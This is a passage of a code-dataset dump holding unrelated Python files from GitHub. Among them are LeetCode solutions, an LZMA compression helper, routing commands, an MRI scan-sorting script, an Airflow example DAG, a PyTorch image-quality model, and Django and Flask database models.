\"-\"\n disableConnection(id)\n config.var[\"primary\"][\"primaryNode\"] = primaryNode\n \n \ndef crash():\n primaryNode = config.var[\"primary\"][\"primaryNode\"]\n neighbors = readInitialCosts(config.var[\"settings\"][\"filename\"], config.var[\"settings\"][\"numServers\"], config.var[\"settings\"][\"numEdges\"], primaryNode)\n nodeList = config.var[\"servers\"][\"nodeList\"]\n \n \n for node in nodeList:\n id = str(node[\"id\"])\n if neighbors[id] != \"inf\":\n primaryNode[\"cost\"][id][\"pathCost\"] = \"inf\"\n primaryNode[\"cost\"][id][\"nextHop\"] = \"-\"\n disableConnection(id) \n config.var[\"primary\"][\"primaryNode\"] = primaryNode","repo_name":"MikeB1124/COMP-429-Distance-Vector-Routing","sub_path":"src/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36622067050","text":"from collections import defaultdict\nDEBUG = False\nDIR = [[1,0], [-1,0], [0, 1], [0, -1]]\nclass Solution:\n def exist(self, board, word) :\n board_dict = defaultdict(int)\n word_dict = defaultdict(int)\n for l in board:\n for c in l:\n board_dict[c] += 1\n for c in word:\n word_dict[c] += 1\n for k, item in board_dict.items():\n word_dict[k] -= item\n for k, item in word_dict.items():\n if item > 0:\n return False\n self.board = board\n self.m = len(board)\n self.n = len(board[0])\n self.word = word\n self.len = len(word)\n self.total = self.m * self.n\n if self.len > self.total:\n return False\n idx_dict = defaultdict(list)\n for idx, c in enumerate(word):\n idx_dict[c].append(idx)\n start_c = word[0]\n start_list = []\n self.edge_map = [[[] for i in range(self.n)] for j in range(self.m)]\n if DEBUG:\n print(self.edge_map)\n for row_idx, row in enumerate(board):\n for col_idx, c in enumerate(row):\n if c == start_c:\n start_list.append((row_idx,col_idx))\n idx_list = idx_dict[c]\n for idx in idx_list:\n if idx >= (self.len -1):\n continue\n next_idx = idx+1\n next_c = word[next_idx]\n idx_list2 = idx_dict[next_c]\n for d in DIR:\n r, c= row_idx + d[0], col_idx + d[1]\n if DEBUG:\n print(row_idx, r, col_idx, c)\n if r<0 or r>= self.m:\n continue\n if c<0 or c>= self.n:\n continue\n if board[r][c] == next_c:\n self.edge_map[row_idx][col_idx].append((r,c))\n if DEBUG:\n for i in self.edge_map:\n print(i)\n # print(self.edge_map)\n\n\n self.gone = [[False for i in range(self.n)] for j in range(self.m)]\n\n for pos in start_list:\n r, c = pos\n self.gone[r][c] = True\n if self.dfs(0,r,c):\n return True\n self.gone[r][c] = False\n\n return False\n\n\n def dfs(self, idx, r, c):\n if DEBUG:\n print(idx, r, c)\n if idx == (self.len-1 ):\n return True\n for next_pos in self.edge_map[r][c]:\n next_r, next_c = next_pos\n if not self.gone[next_r][next_c]:\n if self.word[idx+1] == self.board[next_r][next_c]:\n self.gone[next_r][next_c] = True\n if self.dfs(idx+1, next_r,next_c):\n return True\n self.gone[next_r][next_c] = False\n return False\n\nif DEBUG:\n sol = Solution()\n print(sol.exist([[\"a\",\"a\",\"a\",\"a\"],[\"a\",\"a\",\"a\",\"a\"],[\"a\",\"a\",\"a\",\"a\"]], \"aaaaaaaaaaab\"))\n\n","repo_name":"rundun159/problem_solving","sub_path":"leetcode/2021_4/79.py","file_name":"79.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1261629836","text":"import lzma\nfrom hashlib import md5\n\n\n\ndef len_2_bytes(datalen, max_len=4):\n data = []\n while datalen > 0:\n item = datalen % 256\n datalen = int(datalen / 256)\n data.append(item)\n while len(data) < max_len:\n data.append(0)\n return data\n\n\ndef compress(data, max_len = 4):\n filters = [\n {\n \"id\": lzma.FILTER_LZMA1,\n \"dict_size\": 256 * 1024,\n \"lc\": 3,\n \"lp\": 0,\n \"pb\": 2,\n \"mode\": lzma.MODE_NORMAL\n },\n ]\n\n compressed_data = lzma.compress(data, format=lzma.FORMAT_ALONE, filters=filters)\n lzmadata = bytearray()\n\n for i in range(0, 5):\n lzmadata.append(compressed_data[i])\n\n data_size = len_2_bytes(len(data), max_len)\n\n for size in data_size:\n lzmadata.append(size)\n for i in range(13, len(compressed_data)):\n lzmadata.append(compressed_data[i])\n\n\n return lzmadata\n","repo_name":"PhoenixFire6934/Classic-Brawl","sub_path":"Patcher/LZMA.py","file_name":"LZMA.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"40"} +{"seq_id":"19754917162","text":"valor_inicial = float(input('Digite o valor inicial R$: '))\ntaxa_juros = float(input('Digite a taxa de juros em %: '))\nperiodo = int(input('Quantos anos deseja investir: '))\n\nvalor_final = valor_inicial\n\nfor ano in range(periodo):\n valor_final *= (1 + taxa_juros)\n\nprint(f\"Valor final do investimento: R$ {valor_final:.2f}\")\n\n\"\"\" def calcular_juros_compostos(valor_inicial, taxa_juros, periodo):\n valor_final = valor_inicial * (1 + taxa_juros) ** periodo\n return round(valor_final, 2)\n\n\nresultado = calcular_juros_compostos(valor_inicial, taxa_juros, periodo)\nprint(\"Valor Final:\", resultado) \"\"\"\n\n\n","repo_name":"michaelmdrs/dio","sub_path":"desafios/juros_compostos.py","file_name":"juros_compostos.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17234397920","text":"#! /usr/bin/env python\nimport sys\nimport subprocess\nimport argparse\nimport os\nfrom fastq2matrix import vcf_class, nofile\n\n\ndef main(args):\n\tif nofile(args.vcf): quit(\"Can't find %s... Exiting!\" % args.vcf)\n\tvcf = vcf_class(args.vcf)\n\tvcf.vcf_to_matrix(args.no_iupacgt,na=args.na)\n\nparser = argparse.ArgumentParser(description='TBProfiler pipeline',formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--vcf',help='VCF file',required=True)\nparser.add_argument('--no-iupacgt', dest='no_iupacgt', action='store_true')\nparser.add_argument('--na', default=\"N\",help = \"Character to use for missing data value\")\nparser.add_argument('--threads',default=4, type=int, help='Number of threads for parallel operations')\nparser.set_defaults(func=main)\n\nargs = parser.parse_args()\nargs.func(args)\n","repo_name":"pathogenseq/fastq2matrix","sub_path":"scripts/vcf2matrix.py","file_name":"vcf2matrix.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"5951055729","text":"from django.db import models\nfrom clients.models import ClientModel\n# Create your models here.\nclass ComunicationModel(models.Model):\n client_question = models.ForeignKey(ClientModel, on_delete=models.DO_NOTHING, related_name=\"client_question\")\n #le creo un related name ya que el error reverse accessor no me deja hacer la relacion con el mismo modelo \n client_seller = models.ForeignKey(ClientModel, on_delete=models.CASCADE, related_name=\"client_seller\")\n question = models.TextField()\n answer = models.TextField(blank=True, default=\"\") \n \n @property\n def is_answer(self):\n return bool(self.answer)\n #aca creo una propiedad para que me devuelva un booleano si la respuesta esta vacia o no","repo_name":"S4ntifdz/MercadoVilla","sub_path":"comunication/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"12275858900","text":"\"\"\"\n By now, you are given a secret signature consisting of character 'D' and 'I'.\n 'D' represents a decreasing relationship between two numbers, 'I' represents an increasing relationship between two numbers.\n And our secret signature was constructed by a special integer array, which contains uniquely all the different number from 1 to n\n (n is the length of the secret signature plus 1).\n For example, the secret signature \"DI\" can be constructed by array [2,1,3] or [3,1,2], but won't be constructed by array [3,2,4] or [2,1,3,4],\n which are both illegal constructing special string that can't represent the \"DI\" secret signature.\n\nOn the other hand, now your job is to find the lexicographically smallest permutation of [1, 2, ... n] could refer to the given secret signature in the input.\n\nExample 1:\n\nInput: \"I\"\nOutput: [1,2]\nExplanation: [1,2] is the only legal initial spectial string can construct secret signature \"I\",\nwhere the number 1 and 2 construct an increasing relationship.\n\nExample 2:\n\nInput: \"DI\"\nOutput: [2,1,3]\nExplanation: Both [2,1,3] and [3,1,2] can construct the secret signature \"DI\",\nbut since we want to find the one with the smallest lexicographical permutation, you need to output [2,1,3]\n\nNote:\nThe input string will only contain the character 'D' and 'I'.\nThe length of input string is a positive integer and will not exceed 10,000\n\"\"\"\nclass Solution:\n \"\"\"\n Thoughts:\n 1. DDIDID\n 1234567\n 3215476\n 2. reverse continous D part in the increasing sequence\n\n Time: O(n*log(n)) where n is length of s\n Space: O(n)\n \"\"\"\n def findPermutation(self, s):\n \"\"\"\n :type s: str\n :rtype: List[int]\n \"\"\"\n ret = [i for i in range(1,len(s)+2)]\n index = 0\n while index Path:\n # walk json files\n list_of_session_nums = []\n\n for root, dirs, files in os.walk(rawdata_dir):\n if Path(root).name == 'extra':\n continue\n for file in files:\n if file.endswith('.json'):\n session_num_found = get_series_number(Path(root) / file)\n list_of_session_nums.append(session_num_found)\n if int(session_num_found) == int(session_number):\n print()\n return Path(root) / file\n \n # print(list_of_session_nums, session_number)\n \n \ndef put_nifti_in_the_extra(rawdata_dir: Path) -> Path:\n extra_dir = rawdata_dir / 'extra'\n if not extra_dir.is_dir():\n return\n \n for json in extra_dir.glob('*json'):\n json_prefix = json.name.split('.json')[0]\n \n other_nifti_files = rawdata_dir.glob('*/*nii.gz')\n for other_nifti_file in other_nifti_files:\n if other_nifti_file.parent.name == 'extra':\n continue\n\n nifti_prefix = other_nifti_file.name.split('.nii.gz')[0]\n if json_prefix == nifti_prefix:\n print(f'Moving {other_nifti_file} to extra')\n shutil.move(other_nifti_file, extra_dir / other_nifti_file.name)\n \n # bval\n other_bval_files = rawdata_dir.glob('*/*bval')\n for other_bval_file in other_bval_files:\n if other_bval_file.parent.name == 'extra':\n continue\n\n bval_prefix = other_bval_file.name.split('.bval')[0]\n if json_prefix == bval_prefix:\n print(f'Moving {other_bval_file} to extra')\n shutil.move(other_bval_file, extra_dir / other_bval_file.name) \n \n # bvec\n other_bval_files = rawdata_dir.glob('*/*bvec')\n for other_bval_file in other_bval_files:\n if other_bval_file.parent.name == 'extra':\n continue\n\n bval_prefix = other_bval_file.name.split('.bvec')[0]\n if json_prefix == bval_prefix:\n print(f'Moving {other_bval_file} to extra')\n shutil.move(other_bval_file, extra_dir / other_bval_file.name) \n\n\ndef move_extra_scans():\n # Setup the Google Sheets API credentials\n scope = [\"https://spreadsheets.google.com/feeds\",\n \"https://www.googleapis.com/auth/spreadsheets\",\n \"https://www.googleapis.com/auth/drive.file\",\n \"https://www.googleapis.com/auth/drive\"]\n\n json_loc = \"/data/predict1/home/nick/json_keys/gspread_official_key.json\"\n creds = ServiceAccountCredentials.from_json_keyfile_name(json_loc, scope)\n client = gspread.authorize(creds)\n\n # Open the Google Spreadsheet using its name\n sheet = client.open(\"U24 MRI QC\").worksheet(\"Extra Series\")\n\n # Get the values from the spreadsheet\n data = sheet.get_all_values()\n\n # Convert to pandas DataFrame\n df = pd.DataFrame(data[1:], columns=data[0])\n\n # df = pd.read_csv('U24 MRI QC - Extra Series (3).csv')\n df = df[~df['Certain (1: certain, 2: assumed)'].isnull()]\n df['site'] = df['sub_id_gs'].str[:2]\n\n df['Series in issue'] = df['Series in issue'].str.replace('func', 'fmri')\n df['Series in issue'] = df['Series in issue'].str.replace('dmri', 'dwi')\n df['Series in issue'] = df['Series in issue'].str.replace('anat', 'T1w')\n df['issue_in_fmri'] = df['Series in issue'].str.contains(\n 'fMRI', flags=re.IGNORECASE)\n df['issue_in_dwi'] = df['Series in issue'].str.contains(\n 'dwi', flags=re.IGNORECASE)\n df['issue_in_t1w'] = df['Series in issue'].str.contains(\n 't1w', flags=re.IGNORECASE)\n df['issue_in_t2w'] = df['Series in issue'].str.contains(\n 't2w', flags=re.IGNORECASE)\n df['issue_in_fmap'] = df['Series in issue'].str.contains(\n 'fmap', flags=re.IGNORECASE)\n\n\n\n print(df.groupby('Certain (1: certain, 2: assumed)').count()[\n ['sub_id_gs']])\n\n\n print(df[df['Certain (1: certain, 2: assumed)']==2].groupby(\n 'site').count()[['sub_id_gs']].sort_values(\n 'sub_id_gs',\n ascending=False))\n\n\n print(df[~df['Confirmed from data'].isnull()][[\n 'sub_id_gs', 'ses_id_gs', 'Confirmed from data']])\n\n\n df['number_of_series_to_move'] = df['Series Number to remove'].apply(\n lambda x: len(str(x).split(',')))\n\n\n for index, row in df.iterrows():\n certain = row['Certain (1: certain, 2: assumed)']\n if pd.isna(row['Series Number to remove']):\n continue\n \n if row['Series Number to remove'] == '':\n continue\n \n if certain != '1':\n print(row, 'is not certain')\n print()\n continue\n\n print(f'{row[\"sub_id_gs\"]} {row[\"ses_id_gs\"]}')\n for series_to_remove in row['Series Number to remove'].split(','):\n full_path = get_BIDS_file_with_session_num(\n row['rawdata_location_gs'],\n series_to_remove)\n full_path\n\n if full_path is None:\n print(f'Already moved')\n continue\n\n command = f'\\tremoving Series {series_to_remove} ({full_path.name}) of {row[\"Series in issue\"]} to extra'\n print(command)\n\n new_loc = full_path.parent.parent / 'extra' / full_path.name\n new_loc.parent.mkdir(exist_ok=True)\n\n if full_path != new_loc:\n command = f'\\tmv {full_path} {new_loc}'\n print(command)\n shutil.move(full_path, new_loc)\n \n put_nifti_in_the_extra(Path(row['rawdata_location_gs']))\n \n\nif __name__ == '__main__':\n move_extra_scans()\n","repo_name":"AMP-SCZ/qqc","sub_path":"scripts/move_extra_scans.py","file_name":"move_extra_scans.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24707387391","text":"import random\n\n# Open the txt file\n# TODO REPLACE THIS WITH YOUR FILE PATH\nf = open('words.txt', 'r')\n\n# Set what length of word you want to work with\nword_len = 4\n\n# Set how many words an ending needs to have to be included\nnum_words = 30\n\n# Store each line to a list of words\nunprocessed_words = f.readlines()\n\n\n\n# Create a list for the useable words\nwords = []\n\nfor word in unprocessed_words:\n # Convert the word to lowercase and clean it\n word = word.lower().strip()\n\n # Ignore words containing an apostrophe\n if \"'\" in word:\n continue\n\n # If the word is 4 letters long, add it to our new list of words to use\n if len(word) == word_len:\n # Only add it if it's not already in the list, so we get each word once\n if word not in words:\n words.append(word)\n\n# Print the number of unique four letter words\nprint(f'There are {len(words)} unique, {word_len} letter words in the text file\\n')\n\n\n\n# Create a dictionary for the word endings\nword_endings = {}\n\n# To calculate how many words each ending has\nfor word in words:\n # Extract the last two letters of the word\n word_end = word[-2:]\n\n # If the ending isn't in the dictionary, add it and give a value of 1\n if word_endings.get(word_end) is None:\n word_endings[word_end] = [word]\n\n # If it is in the list, increase its dictionary entry value by 1\n else:\n word_endings[word_end].append(word)\n\n\n# Create a dictionary with the ending and length of its list of words\n# This gives a dict with the freqency of each ending\nending_freq = {k:len(v) for (k,v) in word_endings.items()}\n\n# Sort that dictionary by the number of words\n# So the ending with the most words will be at the top\nending_freq = dict(sorted(ending_freq.items(), key=lambda item: item[1], reverse=True))\n\n\n# Create a list for the popular word endings\npopular_endings = []\n\n# Print a title for the ending frequencies\nprint('| Ending | Frequency |')\n\n# Run through the dictionary and extract the ending and its frequency\nfor end, freq in ending_freq.items():\n # If that frequency is 30 or over\n if freq >= num_words:\n # Print the ending and the frequency for the user\n print(f'|{end:^8}|{freq:^11}|')\n\n # Add the ending to a list of only our popular endings\n popular_endings.append(end)\n\n\n\n# Create a list for our final words\nfinal_words = []\n\n# We want to pick a word for each ending in our popular endings list\nfor ending in popular_endings:\n\n # For each ending, take one of it's words randomly from the endings dictionary\n # and add it to a variable\n chosen_word = random.choice(word_endings[ending])\n\n # Add this word to our final list of words\n final_words.append(chosen_word)\n\n\n# We print the length of the list\nprint(f'\\nThere are {len(final_words)} words in our stimuli list:', end=' ')\n# And its contents\nfor word in final_words:\n print(f'{word},', end=' ')\n\n# Close the text file\nf.close()\n","repo_name":"gabmackie/Exp_prep_and_fMRI_analysis_pin1","sub_path":"section_1A_improved.py","file_name":"section_1A_improved.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2470951536","text":"class Solution:\n def climbStairs(self, n: int) -> int:\n # base cases\n if n == 0: return 0\n if n == 1: return 1\n if n == 2: return 2\n\n # dynamic programming approach:\n # build a map of number of stairs: possible ways\n prev0 = 1\n prev1 = 2\n s = 2\n for i in range(2, n):\n s = prev0 + prev1\n prev0 = prev1\n prev1 = s\n \n return s\n","repo_name":"oliverschwartz/leet","sub_path":"climbing_stairs/climbing_stairs_better.py","file_name":"climbing_stairs_better.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37707982450","text":"import airflow.utils.dates\nfrom airflow.models import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.python_operator import PythonOperator\n\ndag = DAG(\n dag_id=\"example_trigger_target_dag\",\n default_args={\"start_date\": airflow.utils.dates.days_ago(2), \"owner\": \"Airflow\"},\n schedule_interval=None,\n)\n\n\ndef run_this_func(**context):\n \"\"\"\n Print the payload \"message\" passed to the DagRun conf attribute.\n :param context: The execution context\n :type context: dict\n \"\"\"\n print(\"Remotely received value of {} for key=message\".format(context[\"dag_run\"].conf[\"message\"]))\n\n\nrun_this = PythonOperator(task_id=\"run_this\", python_callable=run_this_func, dag=dag)\n\nbash_task = BashOperator(\n task_id=\"bash_task\",\n bash_command='echo \"Here is the message: \\'{{ dag_run.conf[\"message\"] if dag_run else \"\" }}\\'\"',\n dag=dag,\n)","repo_name":"runpil/airflow-examples","sub_path":"examples/core-operators/trigger_target_dag_example.py","file_name":"trigger_target_dag_example.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"74454492280","text":"import torch\r\nfrom torch import nn\r\nimport torch.nn.functional as F\r\n\r\nfrom pytorch_lightning import LightningModule\r\nfrom timm.loss import LabelSmoothingCrossEntropy\r\n\r\nfrom torchmetrics import Accuracy\r\n \r\n\r\nclass BasePIQModel(LightningModule):\r\n def __init__(self, backbone, freeze_backbone=True, lr=1e-4, label_smoothing=0.1, alpha=0.5):\r\n super().__init__()\r\n\r\n self.backbone = backbone\r\n if freeze_backbone:\r\n self.backbone.eval()\r\n for param in self.backbone.parameters():\r\n param.requires_grad = False\r\n \r\n self.quality_loss = nn.L1Loss()\r\n if label_smoothing > 0:\r\n self.scene_loss = LabelSmoothingCrossEntropy(smoothing=label_smoothing)\r\n else:\r\n self.scene_loss = nn.CrossEntropyLoss()\r\n self.train_acc = Accuracy(task='multiclass', num_classes=4)\r\n self.val_acc = Accuracy(task='multiclass', num_classes=4)\r\n\r\n self.lr = lr\r\n self.alpha = alpha\r\n\r\n def forward(self, batch):\r\n x, target_quality, target_scene = self.get_inputs(batch)\r\n out = self.foward_features(x)\r\n quality = out['quality']\r\n scene = out['scene']\r\n return self.get_loss(quality, target_quality, scene, target_scene)\r\n \r\n def get_inputs(self, batch):\r\n x = batch['image']\r\n target_quality = batch['quality_score'].unsqueeze(1)\r\n target_scene = batch['scene_label']\r\n return x, target_quality, target_scene\r\n\r\n def foward_features(self, x):\r\n out = self.backbone(x)\r\n quality = out['quality']\r\n scene = out['scene']\r\n return {\r\n 'quality': quality,\r\n 'scene': scene\r\n }\r\n \r\n def get_loss(self, quality, target_quality, scene, target_scene):\r\n quality_loss = self.quality_loss(quality, target_quality)\r\n scene_loss = self.scene_loss(scene, target_scene)\r\n total_loss = self.alpha * quality_loss + (1 - self.alpha) * scene_loss\r\n \r\n if self.training:\r\n self.train_acc(scene, target_scene)\r\n else:\r\n self.val_acc(scene, target_scene)\r\n \r\n return total_loss, quality_loss, scene_loss\r\n \r\n def training_step(self, batch, batch_idx):\r\n loss, quality_loss, scene_loss = self.forward(batch)\r\n self.log('train_loss', loss)\r\n self.log('train_quality_loss', quality_loss)\r\n self.log('train_scene_loss', scene_loss)\r\n return loss\r\n \r\n def on_train_epoch_end(self):\r\n self.log('train_acc', self.train_acc.compute())\r\n self.train_acc.reset()\r\n \r\n def validation_step(self, batch, batch_idx):\r\n loss, quality_loss, scene_loss = self.forward(batch)\r\n self.log('val_loss', loss)\r\n self.log('val_quality_loss', quality_loss)\r\n self.log('val_scene_loss', scene_loss)\r\n return loss\r\n \r\n def on_validation_epoch_end(self):\r\n self.log('val_acc', self.val_acc.compute())\r\n self.val_acc.reset()\r\n \r\n def configure_optimizers(self):\r\n optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)\r\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=10)\r\n return [optimizer], [scheduler]\r\n \r\n \r\nclass TargetFC(nn.Module):\r\n \"\"\"\r\n Fully connection operations for target net\r\n\r\n Note:\r\n Weights & biases are different for different images in a batch,\r\n thus here we use group convolution for calculating images in a batch with individual weights & biases.\r\n \"\"\"\r\n def __init__(self, weight, bias):\r\n super(TargetFC, self).__init__()\r\n self.weight = weight\r\n self.bias = bias\r\n\r\n def forward(self, input_):\r\n input_re = input_.view(-1, input_.shape[0] * input_.shape[1], input_.shape[2], input_.shape[3])\r\n weight_re = self.weight.view(self.weight.shape[0] * self.weight.shape[1], self.weight.shape[2], self.weight.shape[3], self.weight.shape[4])\r\n bias_re = self.bias.view(self.bias.shape[0] * self.bias.shape[1])\r\n out = F.conv2d(input=input_re, weight=weight_re, bias=bias_re, groups=self.weight.shape[0])\r\n\r\n return out.view(input_.shape[0], self.weight.shape[1], input_.shape[2], input_.shape[3])\r\n \r\n \r\nclass HyperPIQModel(BasePIQModel):\r\n def __init__(self, backbone, freeze_backbone=True, lr=1e-4, label_smoothing=0.1, alpha=0.5):\r\n super().__init__(backbone, freeze_backbone=True, lr=1e-4, label_smoothing=0.1, alpha=0.5)\r\n \r\n self.n_features = self.backbone.n_features\r\n \r\n self.semantic_conv = nn.Sequential(\r\n nn.Conv2d(self.backbone.semantic_dim, 1024, 1, padding=(0, 0)),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(1024, 512, 1, padding=(0, 0)),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(512, self.n_features, 1, padding=(0, 0)),\r\n nn.AdaptiveAvgPool2d((1, 1)),\r\n )\r\n \r\n self.scene_head = nn.Sequential(\r\n nn.Linear(self.n_features, 4),\r\n nn.Softmax(dim=1),\r\n )\r\n \r\n n_features = self.n_features\r\n self.fc1w = nn.Linear(self.n_features, n_features ** 2 // 2)\r\n self.fc1b = nn.Linear(self.n_features, n_features // 2)\r\n\r\n n_features = n_features // 2\r\n self.fc2w = nn.Linear(self.n_features, n_features ** 2 // 2)\r\n self.fc2b = nn.Linear(self.n_features, n_features // 2)\r\n\r\n n_features = n_features // 2\r\n self.fc3w = nn.Linear(self.n_features, n_features ** 2 // 2)\r\n self.fc3b = nn.Linear(self.n_features, n_features // 2)\r\n\r\n n_features = n_features // 2\r\n self.fc4w = nn.Linear(self.n_features, n_features ** 2 // 2)\r\n self.fc4b = nn.Linear(self.n_features, n_features // 2)\r\n \r\n n_features = n_features // 2\r\n self.fc5w = nn.Linear(self.n_features, n_features)\r\n self.fc5b = nn.Linear(self.n_features, 1)\r\n \r\n def foward_features(self, x):\r\n out = self.backbone(x)\r\n multiscale_feat = out['multiscale_feat']\r\n semantic_feat = out['semantic_feat']\r\n # print(multiscale_feat.shape)\r\n # print(semantic_feat.shape)\r\n \r\n out = self.semantic_conv(semantic_feat)\r\n out_flat = out.view(out.shape[0], -1)\r\n scene = self.scene_head(out_flat)\r\n \r\n n_features = self.n_features\r\n w1 = self.fc1w(out_flat)\r\n w1 = w1.view(-1, n_features // 2, n_features, 1, 1)\r\n b1 = self.fc1b(out_flat)\r\n target_net1 = TargetFC(w1, b1)\r\n target_net1.requires_grad_(False)\r\n \r\n n_features = n_features // 2\r\n w2 = self.fc2w(out_flat)\r\n w2 = w2.view(-1, n_features // 2, n_features, 1, 1)\r\n b2 = self.fc2b(out_flat)\r\n target_net2 = TargetFC(w2, b2)\r\n target_net2.requires_grad_(False)\r\n \r\n n_features = n_features // 2\r\n w3 = self.fc3w(out_flat)\r\n w3 = w3.view(-1, n_features // 2, n_features, 1, 1)\r\n b3 = self.fc3b(out_flat)\r\n target_net3 = TargetFC(w3, b3)\r\n target_net3.requires_grad_(False)\r\n \r\n n_features = n_features // 2\r\n w4 = self.fc4w(out_flat)\r\n w4 = w4.view(-1, n_features // 2, n_features, 1, 1)\r\n b4 = self.fc4b(out_flat)\r\n target_net4 = TargetFC(w4, b4)\r\n target_net4.requires_grad_(False)\r\n \r\n n_features = n_features // 2\r\n w5 = self.fc5w(out_flat)\r\n w5 = w5.view(-1, 1, n_features, 1, 1)\r\n b5 = self.fc5b(out_flat)\r\n target_net5 = TargetFC(w5, b5)\r\n target_net5.requires_grad_(False)\r\n \r\n multiscale_feat = multiscale_feat.view(multiscale_feat.shape[0], multiscale_feat.shape[1], 1, 1)\r\n out = target_net1(multiscale_feat)\r\n out = F.relu(out)\r\n out = target_net2(out)\r\n out = F.relu(out)\r\n out = target_net3(out)\r\n out = F.relu(out)\r\n out = target_net4(out)\r\n out = F.relu(out)\r\n out = target_net5(out).squeeze()\r\n \r\n return {\r\n 'quality': out,\r\n 'scene': scene\r\n }\r\n\r\n ","repo_name":"tungdop2/Portrait-Quality-Assessment","sub_path":"model/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8166,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"28218571606","text":"from ml.utils import consts\n\n\nclass Node(object):\n def __init__(self, id:int=None, sitename=consts.GUEST, fid:int=None,\n bid:int=None, weight:float=0, is_leaf:bool=False, sum_grad:float=None,\n sum_hess:float=None, left_nodeid:int=-1, right_nodeid:int=-1):\n self.id = id\n self.sitename = sitename\n self.fid = fid\n self.bid = bid\n self.weight = weight\n self.is_leaf = is_leaf\n self.sum_grad = sum_grad\n self.sum_hess = sum_hess\n self.left_nodeid = left_nodeid\n self.right_nodeid = right_nodeid\n\n\nclass SplitInfo(object):\n def __init__(self, sitename=consts.GUEST, best_fid:int=None, best_bid:int=None,\n sum_grad:float=0, sum_hess:float=0, gain:float=None):\n self.sitename = sitename\n self.best_fid = best_fid\n self.best_bid = best_bid\n self.sum_grad = sum_grad\n self.sum_hess = sum_hess\n self.gain = gain\n","repo_name":"Murlocccc/hetero-secure-boost-origin","sub_path":"ml/tree/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"136120306","text":"# this is where all the database models (schema) will reside\n\nimport datetime\n\nfrom app import db # import db from our app.py file\n\n########################## our code starts here #######################################\n\n# this is done for ORM\n\ngroup_chat_table = db.Table('grp_chat',\n\tdb.Column('stu_id', db.Integer, db.ForeignKey('student.id'), primary_key=True),\n\tdb.Column('uni_id', db.Integer, db.ForeignKey('university.id'), primary_key=True),\n\tdb.Column('admin_username',db.String(80), unique=False, nullable=True)\n)\n\n\n\nclass Student(db.Model):\n\t__tablename__ = 'student' #__tablename__ is an in-built variable\n\t# if we do not explicitly control the naming of our table, the tablename will get the class name\n\n\tid = db.Column(db.Integer, primary_key=True)\n\tname = db.Column(db.String(80), unique=True, nullable=False)\n\ttele_username = db.Column(db.String(80), unique=True, nullable=False)\n\tchat_id=db.Column(db.Integer, unique=True, nullable=False)\n\ttimestamp = db.Column(db.DateTime, default=datetime.datetime.utcnow,\n\t onupdate=datetime.datetime.utcnow)\n\tfaculty = db.Column(db.String(80),unique=False,nullable=False)\n\t# many-to-many model\n\ttouni = db.relationship('University', secondary=group_chat_table,\n\t back_populates='tostu', cascade='all', lazy=True)\n\n\t######## defining methods for the objects\n\tdef __init__(self, name, tele_username,chat_id,faculty): # this is initialization, self is referring to the current object\n\t\tself.name = name\n\t\tself.tele_username = tele_username\n\t\tself.chat_id=chat_id\n\t\tself.faculty=faculty\n\n\n\tdef __repr__(self): # representation, if I want to print object only, what do I print. Equivalent to print(object)\n\t\treturn ''.format(self.name,self.id) # this will eventually be return to user when they post and this return statement is the result shown to them if the object is created successfully\n\t\t# return '[id {}, desc {}]'.format(self.id,self.desc)\n\n\tdef serialize(self): # this must be in JSON format, which in python terms list/dict. convert single row in DB to a json object to user\n\t\treturn{\n\t\t\t'id':self.id,\n\t\t\t'name':self.name,\n\t\t\t'tele_username':self.tele_username,\n\t\t\t#'chat_id':self.chat_id,\n\t\t\t'faculty':self.faculty,\n\t\t\t'confirmed_uni': [{\"uni_id\":log.id,\"country\":log.country ,\"university\":log.name,\"grp_url\":log.grp_url}for log in self.touni]\n\t\t}\n\t# dict in python is unordered, so the result may not follow id, desc, price sequence\n\n\n\nclass University(db.Model):\n\t_tablename__ = 'university' #__tablename__ is an in-built variable\n\t# if we do not explicitly control the naming of our table, the tablename will get the class name\n\n\tid = db.Column(db.Integer, primary_key=True, unique=True)\n\tname = db.Column(db.String(1000), unique=True, nullable=False)\n\tcountry=db.Column(db.String(80), unique=False, nullable=False)\n\tgrp_url=db.Column(db.String(80), unique=False, nullable=True)\n\ttimestamp = db.Column(db.DateTime, default=datetime.datetime.utcnow,\n\t onupdate=datetime.datetime.utcnow)\n\t# many-to-many model\n\ttostu = db.relationship('Student', secondary=group_chat_table,\n\t back_populates='touni'\n\t #, cascade='all',lazy=True\n\t )\n######## defining methods for the objects\n\tdef __init__(self, name,country): # this is initialization, self is referring to the current object\n\t\tself.name = name\n\t\tself.country = 